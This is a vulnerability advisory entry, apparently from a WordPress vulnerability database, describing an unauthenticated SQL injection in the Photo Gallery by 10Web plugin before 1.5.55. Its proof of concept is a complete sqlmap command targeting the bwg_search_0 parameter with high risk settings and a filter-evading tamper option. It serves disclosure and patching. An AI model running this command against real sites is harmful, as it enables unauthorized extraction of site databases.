WordPress Plugin Vulnerabilities
Photo Gallery by 10Web < 1.5.55 - Unauthenticated SQL Injection
Description
SQL injection in the Photo Gallery (10Web Photo Gallery) plugin before 1.5.55 exists via the frontend/models/model.php bwg_search_x parameter.
Impact
All gallery_type is affected by this bug and any unauthenticated remote attacker can exploit the plugin.
Proof of Concept
Sqlmap payload: sqlmap -u 'http://example.com/?p=19&bwg_search_0=*' --dbs --risk 3 --level 5 --threads 10 --tamper=space2comment -p bwg_search_0 -f Video: https://drive.google.com/file/d/1W93XUz5qvWjB27Rn-9L9bIwpBXa2OFNJ/view?usp=sharing Backup link: https://mega.nz/file/S8UxyYpY#p-QLIwouqWq9Q4OV34KNZ8Zo2a7IAKjXVYJ9HZuh2Yk
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2020-05-15 (about 3 years ago)
Added
2020-05-15 (about 3 years ago)
Last Updated
2021-01-22 (about 3 years ago)